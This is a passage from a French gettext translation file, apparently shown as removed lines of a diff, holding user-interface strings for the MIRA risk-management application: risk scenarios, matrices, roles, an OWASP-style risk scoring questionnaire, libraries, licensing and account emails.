acceptances" -msgstr "acceptations de risque" - -#: core/templates/core/quick_start.html:193 -msgid "for risks that are not currently covered." -msgstr "pour les risques qui ne sont actuellement pas couverts." - -#: core/templates/core/ra_create.html:4 -msgid "New Analysis" -msgstr "Nouvelle analyse" - -#: core/templates/core/ra_update.html:65 -msgid "Add Risk Scenario" -msgstr "Ajouter un scénario de risque" - -#: core/templates/core/ra_update.html:65 core/templates/core/ri_create.html:4 -#: core/templates/core/ri_list.html:103 -msgid "New risk scenario" -msgstr "Nouveau scénario de risque" - -#: core/templates/core/review.html:17 -msgid "All good" -msgstr "Tout est bon" - -#: core/templates/core/review.html:22 -#, python-format -msgid "" -"\n" -" %(counter)s error " -"found\n" -" " -msgid_plural "" -"\n" -" %(counter)s errors " -"found\n" -" " -msgstr[0] "" -"\n" -" %(counter)s erreur " -"trouvée\n" -" " -msgstr[1] "" -"\n" -" %(counter)s erreurs " -"trouvées\n" -" " - -#: core/templates/core/review.html:38 -#, python-format -msgid "" -"\n" -" %(counter)s warning " -"found\n" -" " -msgid_plural "" -"\n" -" %(counter)s warnings found\n" -" " -msgstr[0] "" -"\n" -" %(counter)s avertissement trouvé\n" -" " -msgstr[1] "" -"\n" -" %(counter)s avertissements trouvés\n" -" " - -#: core/templates/core/review.html:54 -#, python-format -msgid "" -"\n" -" %(counter)s information to consider\n" -" " -msgid_plural "" -"\n" -" %(counter)s informations to consider\n" -" " -msgstr[0] "" -"\n" -" %(counter)s information à considérer\n" -" " -msgstr[1] "" -"\n" -" %(counter)s informations à considérer\n" -" " - -#: core/templates/core/ri_create.html:13 -msgid "Summary" -msgstr "Résumé" - -#: core/templates/core/ri_create.html:26 -msgid "Scenario Title" -msgstr "Titre du scénario" - -#: core/templates/core/ri_create.html:36 -msgid "Scenario" -msgstr "Scénario" - -#: core/templates/core/ri_create.html:44 core/templates/core/ri_update.html:179 -#: core/templates/snippets/ri_list_nested.html:22 -msgid "Residual risk level" -msgstr "Niveau de risque résiduel" - -#: core/templates/core/ri_create.html:60 -msgid "Follow-up" -msgstr "Suivi" - -#: core/templates/core/ri_create.html:75 core/templates/core/ri_update.html:130 -#: core/templates/snippets/ri_list_nested.html:19 -msgid "Current risk level" -msgstr "Niveau de risque courant" - -#: core/templates/core/ri_create.html:96 -msgid "Associated measures" -msgstr "Mesures associées" - -#: core/templates/core/ri_list.html:162 -msgid "Delete risk scenario?" -msgstr "Supprimer le scénario de risque ?" - -#: core/templates/core/ri_list.html:172 -#: core/templates/snippets/ri_list_nested.html:84 -msgid "No scenario found." -msgstr "Aucune scénario trouvé." - -#: core/templates/core/ri_update.html:19 -msgid "Scope" -msgstr "Périmètre" - -#: core/templates/core/ri_update.html:53 -msgid "Last update" -msgstr "Dernière mise à jour" - -#: core/templates/core/ri_update.html:103 -msgid "Current risk" -msgstr "Risque courant" - -#: core/templates/core/ri_update.html:111 -msgid "Current Assessment" -msgstr "Évaluation courante" - -#: core/templates/core/ri_update.html:160 -msgid "Target Assessment" -msgstr "Évaluation cible" - -#: core/templates/core/ri_update.html:194 -#: core/templates/snippets/mp_data.html:54 -msgid "Additional measures" -msgstr "Mesures supplémentaires" - -#: core/templates/core/ri_update.html:198 -msgid "Select security measures" -msgstr "Sélectionner des mesures de sécurité" - -#: core/templates/core/ri_update.html:198 -msgid "Select" -msgstr "Sélectionner" - -#: core/templates/core/ri_update.html:199 -msgid "New" -msgstr "Ajouter" - -#: core/templates/core/risk_acceptance_email.txt:4 -#: core/templates/registration/password_reset_email.html:33 -msgid "Hello" -msgstr "Bonjour" - -#: core/templates/core/risk_acceptance_email.txt:6 -msgid "" -"You have a risk acceptance review pending. To accept or decline it, click on " -"the link below" -msgstr "" -"Vous avez une revue d'acceptation de risque en attente. Pour l'accepter ou " -"la rejeter, cliquez sur le lien ci-dessous" - -#: core/templates/core/risk_acceptance_email.txt:10 -msgid "" -"If you don't want to use this link or if it is broken, please connect to" -msgstr "" -"Si vous ne voulez pas utiliser ce lien ou s'il est endommagé, connectez vous " -"sur" - -#: core/templates/core/risk_acceptance_email.txt:10 -msgid "and go to risk acceptances" -msgstr "et allez dans les acceptations de risque" - -#: core/templates/core/risk_acceptance_email.txt:12 -#: core/templates/registration/first_connexion_email.html:63 -#: core/templates/registration/password_reset_email.html:59 -msgid "Sincerely" -msgstr "Cordialement" - -#: core/templates/core/risk_acceptance_email.txt:13 -#: core/templates/registration/first_connexion_email.html:64 -#: core/templates/registration/password_reset_email.html:60 -msgid "Mira Team" -msgstr "L'équipe Mira" - -#: core/templates/core/risk_matrix.html:11 -msgid "Default" -msgstr "Par défaut" - -#: core/templates/core/risk_matrix.html:15 -msgid "Critical" -msgstr "Critique" - -#: core/templates/core/risk_matrix_detailed.html:12 -msgid "" -"\n" -" This risk matrix is disabled, therefore it " -"cannot be used in any new analyses.\n" -" In order to enable it, you can edit it and change its status.\n" -" " -msgstr "" -"\n" -" Cette matrice de risque est désactivée, par " -"conséquent elle ne peut pas être utilisée dans de nouvelles analyses.\n" -" Pour l'activer, vous pouvez la modifier et changer son statut.\n" -" " - -#: core/templates/core/risk_matrix_detailed.html:30 -#, python-format -msgid "Used in %(analyses)s analysis" -msgid_plural "Used in %(analyses)s analyses" -msgstr[0] "Utilisée dans %(analyses)s analyse" -msgstr[1] "Utilisée dans %(analyses)s analyses" - -#: core/templates/core/risk_matrix_detailed.html:35 -#, python-format -msgid "across %(projects)s project" -msgid_plural "across %(projects)s projects" -msgstr[0] "à travers %(projects)s projet" -msgstr[1] "à travers %(projects)s projets" - -#: core/templates/core/risk_matrix_list.html:7 core/views.py:2191 -#: core/views.py:2210 -msgid "Matrices" -msgstr "" - -#: core/templates/core/risk_matrix_list.html:41 -msgid "Import matrix" -msgstr "Importer une matrice" - -#: core/templates/core/risk_matrix_list.html:53 -msgid "Matrix" -msgstr "Matrice" - -#: core/templates/core/risk_matrix_list.html:62 -msgid "disabled" -msgstr "désactivée" - -#: core/templates/core/risk_matrix_list.html:107 -msgid "Delete matrix?" -msgstr "Supprimer la matrice ?" - -#: core/templates/core/risk_matrix_list.html:117 -msgid "No matrix found." -msgstr "Aucune matrice trouvée." - -#: core/templates/core/risk_matrix_update.html:5 -msgid "Edit matrix" -msgstr "Éditer la matrice" - -#: core/templates/core/risk_matrix_update.html:11 -msgid "Matrix information" -msgstr "informations sur la matrice" - -#: core/templates/core/role_assignment_create.html:4 -#: core/templates/core/role_list.html:31 -msgid "New role assignment" -msgstr "Nouvelle assignation de rôle" - -#: core/templates/core/role_assignment_create.html:10 -#: core/templates/core/role_assignment_update.html:10 -#: core/templates/core/role_list.html:6 core/templates/core/sidebar.html:236 -#: core/views.py:2065 -msgid "Role assignment" -msgstr "Assignation de rôle" - -#: core/templates/core/role_list.html:10 -msgid "Available roles" -msgstr "Rôles disponibles" - -#: core/templates/core/role_list.html:12 -msgid "" -"\n" -" A assignment provides access to predefined menus and features so " -"that depending \n" -" on the assignment (Administrator, Domain manager, Analyst...), " -"users \n" -" can have access to the resources they need.\n" -" " -msgstr "" -"\n" -" Une assignation donne accès aux menus et fonctionnalités " -"prédéfinis afin que, \n" -" selon l'assignation (Administrateur, Gestionnaire de domaine, " -"Analyste...), un utilisateur \n" -" puisse avoir accès aux ressources dont il a besoin.\n" -" " - -#: core/templates/core/role_list.html:22 -msgid "Learn more" -msgstr "En savoir plus" - -#: core/templates/core/role_list.html:29 -msgid "Role assignments" -msgstr "Assignations de rôle" - -#: core/templates/core/role_list.html:35 core/templates/core/sidebar.html:197 -#: core/templates/core/sidebar.html:206 core/templates/core/user_list.html:6 -#: core/views.py:1875 core/views.py:1908 core/views.py:2123 -msgid "Users" -msgstr "Utilisateurs" - -#: core/templates/core/role_list.html:41 -msgid "User" -msgstr "Utilisateur" - -#: core/templates/core/role_list.html:42 -msgid "Email address" -msgstr "Adresse électronique" - -#: core/templates/core/role_list.html:43 core/templates/core/role_list.html:123 -msgid "Role" -msgstr "Rôle" - -#: core/templates/core/role_list.html:44 core/templates/core/role_list.html:124 -msgid "Domains" -msgstr "Domaines" - -#: core/templates/core/role_list.html:103 -msgid "Delete role assignment?" -msgstr "Supprimer l'assignation de rôle ?" - -#: core/templates/core/role_list.html:113 -#: core/templates/core/role_list.html:185 -msgid "No assignment found." -msgstr "Aucune assignation trouvée." - -#: core/templates/core/role_list.html:122 -msgid "User group" -msgstr "Groupe utilisateur" - -#: core/templates/core/role_update.html:10 -msgid "Role information" -msgstr "Informations sur le rôle" - -#: core/templates/core/scoring.html:7 core/templates/core/sidebar.html:260 -msgid "Scoring assistant" -msgstr "Assistant d'évaluation" - -#: core/templates/core/scoring.html:14 -msgid "Risk matrix" -msgstr "Matrice des risques" - -# OWASP Methodology translations taken from -# https://cours.etsmtl.ca/mgr850/documents/cours/Hiv2013/MGR850_H13_Cours-05_Analyse2Risques.pdf -#: core/templates/core/scoring.html:22 -msgid "How technically skilled is this group of threat agents?" -msgstr "Quel est le niveau de qualification de l'attaquant ?" - -#: core/templates/core/scoring.html:25 -msgid "No technical skills" -msgstr "Pas de compétence technique" - -#: core/templates/core/scoring.html:27 -msgid "Some technical skills" -msgstr "Quelques compétences techniques" - -#: core/templates/core/scoring.html:29 -msgid "Advanced computer user" -msgstr "Utilisateur d'ordinateur expérimenté" - -#: core/templates/core/scoring.html:30 -msgid "Network and programming skills" -msgstr "Compétences en réseaux et programmation" - -#: core/templates/core/scoring.html:33 -msgid "Security penetration skills" -msgstr "Compétences d'intrusion" - -#: core/templates/core/scoring.html:35 -msgid "" -"How motivated is this group of threat agents to find and exploit this " -"vulnerability?" -msgstr "Quels sont les bénéfices espérés de l'attaquant ?" - -#: core/templates/core/scoring.html:38 -msgid "Low or no reward" -msgstr "Pas ou peu de bénéfice" - -#: core/templates/core/scoring.html:41 -msgid "Possible reward" -msgstr "Bénéfice possible" - -#: core/templates/core/scoring.html:46 -msgid "High reward" -msgstr "Bénéfice important" - -#: core/templates/core/scoring.html:48 -msgid "" -"What resources and opportunities are required for this group of threat " -"agents to find and exploit this vulnerability?" -msgstr "" -"Quelles sont les ressources et opportunités requises par l'attaquant pour " -"trouver et exploiter la vulnérabilité ?" - -#: core/templates/core/scoring.html:50 -msgid "Full access or expensive resources required" -msgstr "Accès complet ou ressources coûteuses" - -#: core/templates/core/scoring.html:54 -msgid "Special access or resources required" -msgstr "Ressources et droits d'accès spéciaux" - -#: core/templates/core/scoring.html:57 -msgid "Some access or resources required" -msgstr "Quelques ressources et droits d'accès" - -#: core/templates/core/scoring.html:59 -msgid "No access or resources required" -msgstr "Aucun droit d'accès et aucune ressource" - -#: core/templates/core/scoring.html:61 -msgid "How large is this group of threat agents?" -msgstr "Quelle est l'étendue potentielle du groupe d'attaquants ?" - -#: core/templates/core/scoring.html:65 -msgid "Developers or system administrators" -msgstr "Développeurs ou administrateurs système" - -#: core/templates/core/scoring.html:67 -msgid "Intranet users" -msgstr "Utilisateurs de l'intranet" - -#: core/templates/core/scoring.html:68 -msgid "Partners" -msgstr "Partenaires" - -#: core/templates/core/scoring.html:69 -msgid "Authenticated users" -msgstr "Utilisateurs authentifiés" - -#: core/templates/core/scoring.html:72 -msgid "Anonymous Internet users" -msgstr "Utilisateurs Internet anonymes" - -#: core/templates/core/scoring.html:77 -msgid "Threat agent factors" -msgstr "Facteurs de l'attaquant" - -#: core/templates/core/scoring.html:85 -msgid "" -"How easy is it for this group of threat agents to discover this " -"vulnerability?" -msgstr "Avec quelle facilité l'attaquant peut-il découvrir la vulnérabilité ?" - -#: core/templates/core/scoring.html:88 -msgid "Practically impossible" -msgstr "Pratiquement impossible" - -#: core/templates/core/scoring.html:90 core/templates/core/scoring.html:103 -msgid "Difficult" -msgstr "Difficilement" - -#: core/templates/core/scoring.html:94 core/templates/core/scoring.html:105 -msgid "Easy" -msgstr "Facilement" - -#: core/templates/core/scoring.html:96 core/templates/core/scoring.html:109 -msgid "Automated tools available" -msgstr "Outils automatiques disponible" - -#: core/templates/core/scoring.html:98 -msgid "" -"How easy is it for this group of threat agents to actually exploit this " -"vulnerability?" -msgstr "Avec quelle facilité l'attaquant peut-il exploiter la vulnérabilité ?" - -#: core/templates/core/scoring.html:101 -msgid "Theoretical" -msgstr "Théoriquement" - -#: core/templates/core/scoring.html:111 -msgid "How well known is this vulnerability to this group of threat agents?" -msgstr "Dans quelle mesure la vulnérabilité est-elle connue de l'attaquant ?" - -#: core/templates/core/scoring.html:114 -msgid "Unknown" -msgstr "Inconnue" - -#: core/templates/core/scoring.html:117 -msgid "Hidden" -msgstr "Cachée" - -#: core/templates/core/scoring.html:119 -msgid "Obvious" -msgstr "Évidente" - -#: core/templates/core/scoring.html:122 -msgid "Public knowledge" -msgstr "De notoriété publique" - -#: core/templates/core/scoring.html:124 -msgid "How likely is an exploit to be detected?" -msgstr "Quelle est la probabilité qu'un exploit soit détecté" - -#: core/templates/core/scoring.html:127 -msgid "Active detection in application" -msgstr "Détection active dans l'application" - -#: core/templates/core/scoring.html:129 -msgid "Logged and reviewed" -msgstr "Audit et révision" - -#: core/templates/core/scoring.html:134 -msgid "Logged without review" -msgstr "Audit sans révision" - -#: core/templates/core/scoring.html:135 -msgid "Not logged" -msgstr "Absence d'audit" - -#: core/templates/core/scoring.html:140 -msgid "Vulnerability factors" -msgstr "Facteurs de vulnérabilité" - -#: core/templates/core/scoring.html:151 -msgid "How much financial damage will result from an exploit?" -msgstr "Quelle serait la hauteur des dégâts financiers suivant un exploit" - -#: core/templates/core/scoring.html:154 -msgid "Less than the cost to fix the vulnerability" -msgstr "Moins que le coût de la correction de la vulnérabilité" - -#: core/templates/core/scoring.html:156 -msgid "Minor effect on annual profit" -msgstr "Effet mineur sur le bénéfice annuel" - -#: core/templates/core/scoring.html:160 -msgid "Significant effect on annual profit" -msgstr "Effet significatif sur le bénéfice annuel" - -#: core/templates/core/scoring.html:162 -msgid "Bankruptcy" -msgstr "Faillite" - -#: core/templates/core/scoring.html:164 -msgid "" -"Would an exploit result in reputation damage that would harm the business?" -msgstr "" -"Un exploit impacterait-il la réputation de l'entreprise au point de nuire à " -"ses affaires ?" - -#: core/templates/core/scoring.html:167 -msgid "Minimal damage" -msgstr "Impact minime" - -#: core/templates/core/scoring.html:170 -msgid "Loss of major accounts" -msgstr "Perte de grands comptes" - -#: core/templates/core/scoring.html:171 -msgid "Loss of goodwill" -msgstr "Chute d'écart d'acquisition (goodwill)" - -#: core/templates/core/scoring.html:175 -msgid "Brand damage" -msgstr "Image de marque détériorée" - -#: core/templates/core/scoring.html:177 -msgid "How much exposure does non-compliance introduce?" -msgstr "Dans quelle mesure s'expose-t-on en cas de non-conformité ?" - -#: core/templates/core/scoring.html:181 -msgid "Minor violation" -msgstr "Violation mineure" - -#: core/templates/core/scoring.html:184 -msgid "Clear violation" -msgstr "Violation flagrante" - -#: core/templates/core/scoring.html:186 -msgid "High profile violation" -msgstr "Violation de haut niveau" - -#: core/templates/core/scoring.html:190 -msgid "How much personally identifiable information could be disclosed?" -msgstr "" -"Quelle quantité d'information personnellement identifiable pourrait être " -"divulguée ?" - -#: core/templates/core/scoring.html:195 -msgid "One individual" -msgstr "Un seul individu" - -#: core/templates/core/scoring.html:197 -msgid "Hundreds of people" -msgstr "Centaines de personnes" - -#: core/templates/core/scoring.html:199 -msgid "Thousands of people" -msgstr "Milliers de personnes" - -#: core/templates/core/scoring.html:201 -msgid "Millions of people" -msgstr "Millions de personnes" - -#: core/templates/core/scoring.html:206 -msgid "Business impact factors" -msgstr "Facteurs d'impact commercial" - -#: core/templates/core/scoring.html:212 -msgid "Ignore" -msgstr "Ignorer" - -#: core/templates/core/scoring.html:221 -msgid "How much data could be disclosed and how sensitive is it?" -msgstr "" -"Quelle quantité de données pourrait être divulguée et s'agit-il de données " -"sensible ?" - -#: core/templates/core/scoring.html:225 -msgid "Minimal non-sensitive data disclosed" -msgstr "Quantité minime de données non-sensibles divulguée" - -#: core/templates/core/scoring.html:229 -msgid "Minimal critical data or extensive non-sensitive data disclosed" -msgstr "" -"Quantité minime de données critiques ou quantité importante de données non-" -"sensibles divulguée" - -#: core/templates/core/scoring.html:230 -msgid "Extensive critical data disclosed" -msgstr "Quantité importante de données critiques divulguée" - -#: core/templates/core/scoring.html:232 -msgid "All data disclosed" -msgstr "Totalité des données divulguée" - -#: core/templates/core/scoring.html:234 -msgid "How much data could be corrupted and how damaged is it?" -msgstr "" -"Quelle quantité de données pourrait être corrompue et dans quelle mesure ?" - -#: core/templates/core/scoring.html:237 -msgid "Minimal slightly corrupt data" -msgstr "Quantité minime de données légèrement corrompue" - -#: core/templates/core/scoring.html:239 -msgid "Minimal seriously corrupt data" -msgstr "Quantité minime de données sérieusement corrompue" - -#: core/templates/core/scoring.html:241 -msgid "Extensive slightly corrupt data" -msgstr "Quantité importante de données légèrement corrompue" - -#: core/templates/core/scoring.html:243 -msgid "Extensive seriously corrupt data" -msgstr "Quantité importante de données sérieusement corrompue" - -#: core/templates/core/scoring.html:245 -msgid "All data totally corrupt" -msgstr "Totalité des données corrompue" - -#: core/templates/core/scoring.html:247 -msgid "How much service could be lost and how vital is it?" -msgstr "" -"Quelle quantité de service pourrait être perdue et à quel point est-elle " -"vitale ?" - -#: core/templates/core/scoring.html:250 -msgid "Minimal secondary services interrupted" -msgstr "Quantité minime de services secondaires interrompue" - -#: core/templates/core/scoring.html:254 -msgid "Minimal primary or extensive secondary services interrupted" -msgstr "" -"Quantité minime de services primaires ou quantité importante de services " -"secondaires interrompue" - -#: core/templates/core/scoring.html:256 -msgid "Extensive primary services interrupted" -msgstr "Quantité importante de services primaires interrompue" - -#: core/templates/core/scoring.html:258 -msgid "All services completely lost" -msgstr "Totalité des services complètement perdue" - -#: core/templates/core/scoring.html:260 -msgid "Are the threat agents' actions traceable to an individual?" -msgstr "Les actions des attaquants sont-elles attribuables à un individu ?" - -#: core/templates/core/scoring.html:263 -msgid "Fully traceable" -msgstr "Traçabilité complète" - -#: core/templates/core/scoring.html:269 -msgid "Possibly traceable" -msgstr "Traçabilité possible" - -#: core/templates/core/scoring.html:271 -msgid "Completely anonymous" -msgstr "Traçabilité impossible" - -#: core/templates/core/scoring.html:276 -msgid "Technical impact factors" -msgstr "Facteurs d'impact technique" - -#: core/templates/core/scoring.html:285 -msgid "Assessment vector:" -msgstr "Vecteurs d'évaluation :" - -#: core/templates/core/scoring.html:290 -#: core/templates/snippets/risk_matrix.html:37 -#: core/templates/snippets/risk_matrix.html:83 -msgid "Probability" -msgstr "Probabilité" - -#: core/templates/core/scoring.html:298 -msgid "Risk level" -msgstr "Niveau de risque" - -#: core/templates/core/scoring.html:307 -#: core/templates/snippets/risk_matrix.html:7 -#: core/templates/snippets/risk_matrix.html:43 -msgid "Impact" -msgstr "" - -#: core/templates/core/search_results.html:8 -msgid "Search results" -msgstr "Résultats de la recherche" - -#: core/templates/core/search_results.html:35 -msgid "" -"\n" -" Risk analysis\n" -" " -msgid_plural "" -"\n" -" Risk analyses\n" -" " -msgstr[0] "" -"\n" -" Analyse de risque\n" -" " -msgstr[1] "" -"\n" -" Analyses de risque\n" -" " - -#: core/templates/core/search_results.html:42 -#: core/templates/core/search_results.html:64 -#: core/templates/core/search_results.html:86 -msgid "No results matched your query. Try something more specific." -msgstr "" -"Aucun résultat ne correspond à votre requête. Essayez quelque chose de plus " -"spécifique." - -#: core/templates/core/search_results.html:57 -msgid "" -"\n" -" Risk scenario\n" -" " -msgid_plural "" -"\n" -" Risk scenarios\n" -" " -msgstr[0] "" -"\n" -" Scénario de risque\n" -" " -msgstr[1] "" -"\n" -" Scénarios de risque\n" -" " - -#: core/templates/core/search_results.html:79 -msgid "" -"\n" -" Security measure\n" -" " -msgid_plural "" -"\n" -" Security measures\n" -" " -msgstr[0] "" -"\n" -" Mesure de sécurité\n" -" " -msgstr[1] "" -"\n" -" Mesures de sécurité\n" -" " - -#: core/templates/core/security_function_list.html:101 -msgid "New security function" -msgstr "Nouvelle fonction de sécurité" - -#: core/templates/core/security_function_list.html:139 -msgid "Delete security function?" -msgstr "Supprimer la fonction de sécurité ?" - -#: core/templates/core/security_function_list.html:148 -msgid "No security function found." -msgstr "Aucune fonction de sécurité trouvée." - -#: core/templates/core/sidebar.html:63 -msgid "Dashboard" -msgstr "Tableau de bord" - -#: core/templates/core/sidebar.html:88 -msgid "Risk management" -msgstr "Gestion des risques" - -#: core/templates/core/sidebar.html:129 -msgid "General" -msgstr "Général" - -#: core/templates/core/sidebar.html:182 -msgid "Rating matrices" -msgstr "Matrices d'évaluation" - -#: core/templates/core/sidebar.html:187 -msgid "Access management" -msgstr "Gestion des accès" - -#: core/templates/core/sidebar.html:242 -msgid "Extra" -msgstr "" - -#: core/templates/core/sidebar.html:269 -#: core/templates/library/library_list.html:8 -msgid "Libraries" -msgstr "Bibliothèques" - -#: core/templates/core/sidebar.html:279 -msgid "Backups" -msgstr "Sauvegardes" - -#: core/templates/core/sidebar.html:288 core/templates/license/overview.html:6 -msgid "License management" -msgstr "Gestion de la licence" - -#: core/templates/core/sidebar.html:394 -msgid "Log out" -msgstr "Déconnexion" - -#: core/templates/core/threat_list.html:103 -msgid "New threat" -msgstr "Nouvelle menace" - -#: core/templates/core/threat_list.html:141 -msgid "Delete threat?" -msgstr "Supprimer la menace ?" - -#: core/templates/core/threat_list.html:151 -msgid "No threat found." -msgstr "Aucune menace trouvée." - -#: core/templates/core/treatment.html:18 -msgid "Treatment progress overview" -msgstr "Aperçu de l'avancement du traitement" - -#: core/templates/core/treatment.html:25 -msgid "Your pending measures" -msgstr "Vos mesures en attente" - -#: core/templates/core/treatment.html:26 -msgid "ordered by ranking score" -msgstr "classées par évaluation" - -#: core/templates/core/treatment.html:32 -msgid "Ranking score" -msgstr "Évaluation" - -#: core/templates/core/treatment.html:56 -msgid "No pending measure." -msgstr "Aucune mesure en attente" - -#: core/templates/core/treatment.html:63 -msgid "" -"Ranking score is an adaptive metric that combines the information of effort " -"and current risk level, and crosses it with the other data to assist you for " -"the prioritization." -msgstr "" -"L'évaluation est une mesure qui combine l'effort et le niveau de risque " -"courant, puis les croise avec d'autres données afin de vous assister à la " -"priorisation." - -#: core/templates/core/treatment.html:66 -msgid "Projects summary is empty." -msgstr "Le résumé des projets est vide." - -#: core/templates/core/user_create.html:4 -msgid "New user" -msgstr "Nouvel utilisateur" - -#: core/templates/core/user_create.html:10 -#: core/templates/core/user_update.html:11 -msgid "User information" -msgstr "informations sur l'utilisateur" - -#: core/templates/core/user_create.html:43 -msgid "Send" -msgstr "Envoyer" - -#: core/templates/core/user_list.html:100 -msgid "New User" -msgstr "Nouvel utilisateur" - -#: core/templates/core/user_list.html:108 -#: core/templates/license/overview.html:39 -msgid "out of" -msgstr "sur" - -#: core/templates/core/user_list.html:114 -msgid "Email Address" -msgstr "Adresse électronique" - -#: core/templates/core/user_list.html:115 -msgid "User Groups" -msgstr "Groupes utilisateurs" - -#: core/templates/core/user_list.html:116 -#: core/templates/snippets/associated_users_list_nested.html:10 -#: core/templates/snippets/users_list_nested.html:10 -msgid "Full Name" -msgstr "Nom complet" - -#: core/templates/core/user_list.html:117 -msgid "Created At" -msgstr "Créé le" - -#: core/templates/core/user_list.html:126 -#: core/templates/snippets/associated_users_list_nested.html:22 -#: core/templates/snippets/users_list_nested.html:22 -msgid "inactive" -msgstr "inactif" - -#: core/templates/core/user_list.html:129 -#: core/templates/snippets/associated_users_list_nested.html:25 -#: core/templates/snippets/users_list_nested.html:25 -msgid "superuser" -msgstr "superutilisateur" - -#: core/templates/core/user_list.html:167 -msgid "Delete user?" -msgstr "Supprimer l'utilisateur ?" - -#: core/templates/core/user_list.html:167 -msgid "" -"WARNING: It is STRONGLY recommended to set " -"this user as inactive instead of deleting it, as it might break foreign-key " -"relationship with risk analyses." -msgstr "" -"ATTENTION : Il est fortement recommandé de " -"désactiver cet utilisateur plutôt que de le supprimer, car cela pourrait " -"rompre la relation clé étrangère avec les analyses de risques." - -#: core/templates/core/user_list.html:176 -#: core/templates/snippets/associated_users_list_nested.html:49 -#: core/templates/snippets/users_list_nested.html:49 -msgid "No user found." -msgstr "Aucun utilisateur trouvé." - -#: core/templates/core/user_update.html:5 -msgid "Edit user" -msgstr "Modifier l'utilisateur" - -#: core/templates/library/library_detail.html:20 -#: core/templates/library/library_list.html:81 -msgid "Import library" -msgstr "Importer une bibliothèque" - -#: core/templates/library/library_detail.html:30 -msgid "Objects of type:" -msgstr "Objets de type :" - -#: core/templates/library/library_detail.html:41 -msgid "Threat name" -msgstr "Nom de la menace" - -#: core/templates/library/library_detail.html:56 -msgid "Security function name" -msgstr "Nom de la fonction de sécurité" - -#: core/templates/library/library_list.html:14 -msgid "Default libraries" -msgstr "Bibliothèques par défaut" - -#: core/templates/library/library_list.html:18 -msgid "Library name" -msgstr "Nom de la bibliothèque" - -#: core/templates/library/library_list.html:19 -msgid "Language" -msgstr "Langue" - -#: core/templates/library/library_list.html:46 -#, python-format -msgid "" -"\n" -" %(counter)s threat\n" -" " -msgid_plural "" -"\n" -" %(counter)s threats\n" -" " -msgstr[0] "" -"\n" -" %(counter)s menace\n" -" " -msgstr[1] "" -"\n" -" %(counter)s menaces\n" -" " - -#: core/templates/library/library_list.html:55 -#, python-format -msgid "" -"\n" -" %(counter)s matrix\n" -" " -msgid_plural "" -"\n" -" %(counter)s matrices\n" -" " -msgstr[0] "" -"\n" -" %(counter)s matrice\n" -" " -msgstr[1] "" -"\n" -" %(counter)s matrices\n" -" " - -#: core/templates/library/library_list.html:64 -#, python-format -msgid "" -"\n" -" %(counter)s security " -"function\n" -" " -msgid_plural "" -"\n" -" %(counter)s security " -"functions\n" -" " -msgstr[0] "" -"\n" -" %(counter)s fonction de sécurité\n" -" " -msgstr[1] "" -"\n" -" %(counter)s fonctions de sécurité\n" -" " - -#: core/templates/library/library_list.html:91 -msgid "No library found." -msgstr "Aucune bibliothèque trouvée." - -#: core/templates/library/library_list.html:103 -msgid "Upload your own library" -msgstr "Télécharger votre propre bibliothèque" - -#: core/templates/library/library_list.html:116 -msgid "Upload" -msgstr "Télécharger" - -#: core/templates/library/library_upload.html:8 -msgid "Upload a library" -msgstr "Télécharger une bibliothèque" - -#: core/templates/license/overview.html:18 -msgid "Deployment mode" -msgstr "Mode de déploiement" - -#: core/templates/license/overview.html:27 -msgid "License type" -msgstr "Type de licence" - -#: core/templates/license/overview.html:36 -msgid "Used seats" -msgstr "Emplacements utilisés" - -#: core/templates/license/overview.html:45 -msgid "Seats limit" -msgstr "Limite utilisateurs" - -#: core/templates/license/overview.html:48 -msgid "Disabled" -msgstr "Désactivée" - -#: core/templates/license/overview.html:63 -msgid "Expiration date" -msgstr "Date d'expiration" - -#: core/templates/registration/first_connexion_confirm.html:31 -#: core/templates/registration/login.html:21 -msgid "Hello there" -msgstr "Bonjour" - -#: core/templates/registration/first_connexion_confirm.html:33 -#: core/templates/registration/login.html:23 -msgid "This is MIRA. Your streamlined" -msgstr "Bienvenue dans MIRA. Votre " - -#: core/templates/registration/first_connexion_confirm.html:33 -#: core/templates/registration/login.html:23 -msgid "one-stop shop" -msgstr "solution complète" - -#: core/templates/registration/first_connexion_confirm.html:34 -#: core/templates/registration/login.html:24 -msgid "for risk assessment and management." -msgstr "sur mesure pour l'évaluation et la gestion du risque." - -#: core/templates/registration/first_connexion_confirm.html:36 -msgid "In order to log in, you must create a password for your account." -msgstr "" -"Afin de vous connecter, vous devez créer un mot de passe pour votre compte." - -#: core/templates/registration/first_connexion_confirm.html:48 -msgid "I agree and acccept" -msgstr "Je suis d'accord et j'accepte les" - -#: core/templates/registration/first_connexion_confirm.html:49 -msgid "Terms and conditions of use" -msgstr "Conditions générales d'utilisation" - -#: core/templates/registration/first_connexion_confirm.html:77 -msgid "Confirm password" -msgstr "Confirmer le mot de passe" - -#: core/templates/registration/first_connexion_email.html:14 -msgid "Welcome to Mira!" -msgstr "Bienvenue sur Mira!" - -#: core/templates/registration/first_connexion_email.html:15 -#: core/templates/registration/password_reset_email.html:23 -msgid "Your all-in-one Risk Management Platform" -msgstr "" - -#: core/templates/registration/first_connexion_email.html:33 -msgid "" -"You have been granted access to Mira. To get started, use the link below to " -"define your password:" -msgstr "" -"Vous avez obtenu un acccès à MIRA. Pour commencer, utilisez le lien ci-" -"dessous pour définir votre mot de passe:" - -#: core/templates/registration/first_connexion_email.html:38 -msgid "Set my password" -msgstr "Initialiser mon mot de passe" - -#: core/templates/registration/first_connexion_email.html:41 -#: core/templates/registration/password_reset_email.html:44 -msgid "An issue with the link? copy and paste the following in your browser" -msgstr "" -"Un problème avec le lien? Copiez et collez ce qui suit dans votre navigateur" - -#: core/templates/registration/first_connexion_email.html:49 -msgid "" -"This link can only be used once. In case of an issue, you can access your " -"instance" -msgstr "" -"Ce lien ne peut être utilisé qu'une seule fois. Si vous rencontrez un " -"problème, vous pouvez accéder à votre instance" - -#: core/templates/registration/first_connexion_email.html:49 -#: core/templates/registration/first_connexion_email.html:58 -#: core/templates/registration/password_reset_email.html:52 -msgid "here" -msgstr "ici" - -#: core/templates/registration/first_connexion_email.html:49 -msgid "and request a password reset" -msgstr "et demandez une autre réinitialisation de mot de passe" - -#: core/templates/registration/first_connexion_email.html:54 -#: core/templates/registration/password_reset_email.html:56 -msgid "" -"If you, or your organization, did not make this request, you can simply " -"ignore this email" -msgstr "" -"Si vous, ou votre organisation, n'avez pas effectué cette demande, vous " -"pouvez simplement ignorer cet email" - -#: core/templates/registration/first_connexion_email.html:58 -msgid "Learn more about Mira" -msgstr "En savoir plus sur Mira" - -#: core/templates/registration/login.html:26 -msgid "You need to" -msgstr "Vous devez" - -#: core/templates/registration/login.html:26 -msgid "login" -msgstr "vous connecter" - -#: core/templates/registration/login.html:26 -msgid "to access all the features." 